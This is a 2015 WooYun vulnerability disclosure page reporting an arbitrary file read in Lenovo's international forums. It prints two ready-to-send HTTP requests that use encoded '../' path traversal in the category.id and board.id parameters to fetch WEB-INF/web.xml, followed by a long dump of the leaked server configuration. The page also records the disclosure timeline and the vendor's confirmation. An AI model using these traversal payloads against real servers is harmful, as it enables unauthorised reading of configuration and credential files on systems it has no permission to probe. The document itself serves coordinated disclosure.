当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101549

漏洞标题:联想某国际业务任意文件读取打包

相关厂商:联想

漏洞作者: 路人甲

提交时间:2015-03-16 09:48

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-16: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商已经确认,细节仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-30: 细节向公众公开

简要描述:

详细说明:

国际论坛forums.lenovo.com.
两处打包

GET /lnv/?category.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


GET /lnv/board/message?board.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&thread.id=1 HTTP/1.1
Referer: http://forums.lenovo.com./
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


Content-Length: 16894
Connection: close
Content-Type: text/xml;charset=UTF-8
<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
	version="2.4">
	<display-name>web2</display-name>
	<session-config>
		<session-timeout>30</session-timeout>
	</session-config>
	<context-param>
		<param-name>jspellLexicons</param-name>
		<param-value>res/jspell/</param-value>
	</context-param>
	<context-param>
		<param-name>tapestry.app-package</param-name>
		<param-value>lithium.web2</param-value>
	</context-param>
	<listener>
		<listener-class>lithium.servlet.session.ApplicationSessionTrackerHttpSessionListener</listener-class>
		<listener-class>lithium.reporting.metrics.unique.UniqueMetricProcessorHttpSessionListener</listener-class>
		<listener-class>lithium.user.UserSessionListener</listener-class>
	</listener>
	<!-- ================================================================= Filters -->
	<filter>
		<filter-name>characterEncodingFilter</filter-name>
		<filter-class>lithium.servlet.CharacterEncodingFilter</filter-class>
	</filter>
	<filter>
		<filter-name>putTomcatRequestFilter</filter-name>
		<filter-class>lithium.servlet.PutTomcatRequestinAttributeFilter</filter-class>
	</filter>
	<filter>
		<filter-name>applicationSelectorFilter</filter-name>
		<filter-class>lithium.apps.main.container.filters.ApplicationSelectorFilter</filter-class>
	</filter>
	<filter>
		<filter-name>clickjackingFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>p3pHeaderFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>clearStateFilter</filter-name>
		<filter-class>lithium.boards.servlet.ClearStateFilter</filter-class>
	</filter>
	<filter>
		<filter-name>trackingFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	
	<filter>
		<filter-name>operationsLoggingFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>blackboxFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>liaTapestryFilter</filter-name>
		<filter-class>lithium.web2.services.servlet.LiaTapestryFilter</filter-class>
	</filter>
	<filter>
		<filter-name>facebookSignedRequestFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>rewriteFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
		<init-param>
			<param-name>targetFilterLifecycle</param-name>
			<param-value>true</param-value>
		</init-param>
	</filter>
	
	<filter>
		<filter-name>httpRequestContextFilter</filter-name>
		<filter-class>lithium.servlet.HttpRequestContextFilter</filter-class>
	</filter>
	<filter>
		<filter-name>agentDetectionFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>sessionIdStripperFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>setHeaderValidationFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>metricsFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>requestTransformFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>replicatedSessionFilter</filter-name>
		<filter-class>lithium.servlet.session.ReplicatedSessionFilter</filter-class>
	</filter>
	<filter>
		<filter-name>userSessionFilterWeb2</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	
	<filter>
		<filter-name>realtimeNotificationAuthFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>visitorFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>bannedUserFilterChainWeb2</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>mimeFilter</filter-name>
		<filter-class>lithium.servlet.MimeFilter</filter-class>
		<init-param>
			<param-name>charset.encoding</param-name>
			<param-value>UTF-8</param-value>
		</init-param>
	</filter>
	<filter>
		<filter-name>clientDeviceDetectionFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>limitFilterChainWeb2</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>funnelFilterChain</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>pageCacheFilterChain</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>forwardedHeadersFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>canonicalIpFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>vanityHostnameRedirectFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>accessCheckFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>notSecureSessionCookieFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>sipDomainRequestManagerFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<filter>
		<filter-name>multipartRequestFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<!--
        Adds a non-reversible hashed IP as a request attribute lithium.servlet.HashedIpFilter.HASHED_IP_ATTR.
        Must come before maskedIpFilter (so it has access to full IP).
    -->
    <filter>
		<filter-name>hashedIpFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<!--
        Masks the IP address (wraps the HttpServletRequest) for anonymous requests.
        Adds a boolean request attribute lithium.servlet.MaskedIpFilter.IS_MASKED ("true" or "false" depending on if
        the IP is masked).
    -->
	<filter>
		<filter-name>maskedIpFilter</filter-name>
		<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
	</filter>
	<!-- =================================================================
		 Filter Mappings
		 Determines which filters run for given url patterns or servlet names.  
		 Note that the filters execute in this order.
	-->
	<filter-mapping>
		<filter-name>characterEncodingFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>putTomcatRequestFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<!-- 
	    applicationSelectorFilter needs to occur before any filter which depends on a specific application context. 
	-->
	<filter-mapping>
		<filter-name>applicationSelectorFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>ERROR</dispatcher>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>funnelFilterChain</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<!--
		The forwardedHeadersFilter filter needs to be before the canonicalIpFilter filter 
		since it modifies the request headers.
	-->
	<filter-mapping>
		<filter-name>forwardedHeadersFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<!--
		The canonicalIpFilter filter needs to be before any filter that accesses, logs, or otherwise 
		uses the remoteAddr from the request.
    -->
	<filter-mapping>
		<filter-name>canonicalIpFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>vanityHostnameRedirectFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>p3pHeaderFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>accessCheckFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<!-- 
	    the notSecureSessionCookieFilter needs to be before the RewriteFilter 
		and the UserSessionFilter to prevent infinite redirects 
	-->
	<filter-mapping>
		<filter-name>notSecureSessionCookieFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>sipDomainRequestManagerFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>clearStateFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>trackingFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>operationsLoggingFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>blackboxFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>facebookSignedRequestFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>rewriteFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>replicatedSessionFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>agentDetectionFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>sessionIdStripperFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>setHeaderValidationFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>metricsFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>requestTransformFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>limitFilterChainWeb2</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>mimeFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>multipartRequestFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>userSessionFilterWeb2</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	
		<filter-mapping>
		<filter-name>realtimeNotificationAuthFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>visitorFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>bannedUserFilterChainWeb2</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>clientDeviceDetectionFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>pageCacheFilterChain</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>hashedIpFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>maskedIpFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>httpRequestContextFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
		<dispatcher>ERROR</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>liaTapestryFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
		<dispatcher>ERROR</dispatcher>
	</filter-mapping>
	<filter-mapping>
		<filter-name>clickjackingFilter</filter-name>
		<url-pattern>/*</url-pattern>
		<dispatcher>REQUEST</dispatcher>
		<dispatcher>FORWARD</dispatcher>
	</filter-mapping>
	
	<!-- ================================================================= Servlets -->
	<servlet>
		<servlet-name>javaScriptServlet</servlet-name>
		<servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
	</servlet>
    <servlet>
        <servlet-name>cssServlet</servlet-name>
        <servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
    </servlet>
	<!-- ================================================================= Servlet Mappings -->
	<servlet-mapping>
		<servlet-name>javaScriptServlet</servlet-name>
		<url-pattern>/scripts/*</url-pattern>
	</servlet-mapping>
    <servlet-mapping>
        <servlet-name>cssServlet</servlet-name>
        <url-pattern>/assets/css/*</url-pattern>
    </servlet-mapping>
	<!-- ================================================================= Error Page Mappings -->
	<error-page>
		<error-code>404</error-code>
		<location>/errors/error404page</location>
	</error-page>
	<!-- ================================================================= Mime Mappings -->
	<mime-mapping>
		<extension>html</extension>
		<mime-type>text/html</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>css</extension>
		<mime-type>text/css</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>js</extension>
		<mime-type>text/javascript</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>gif</extension>
		<mime-type>image/gif</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>jpg</extension>
		<mime-type>image/jpeg</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>png</extension>
		<mime-type>image/png</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>bmp</extension>
		<mime-type>image/bmp</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>au</extension>
		<mime-type>audio/basic</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>jad</extension>
		<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>jar</extension>
		<mime-type>application/java-archive</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>cab</extension>
		<mime-type>application/java-archive</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>xml</extension>
		<mime-type>text/xml</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>txt</extension>
		<mime-type>text/plain</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>class</extension>
		<mime-type>application/octet-stream</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>cacert</extension>
		<mime-type>application/x-x509-ca-cert</mime-type>
	</mime-mapping>
。。。。。。。。。。。。。
。。。。。。。。。。。。。。。


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-16 15:01

厂商回复:

谢谢您对联想安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无

漏洞评价:

评论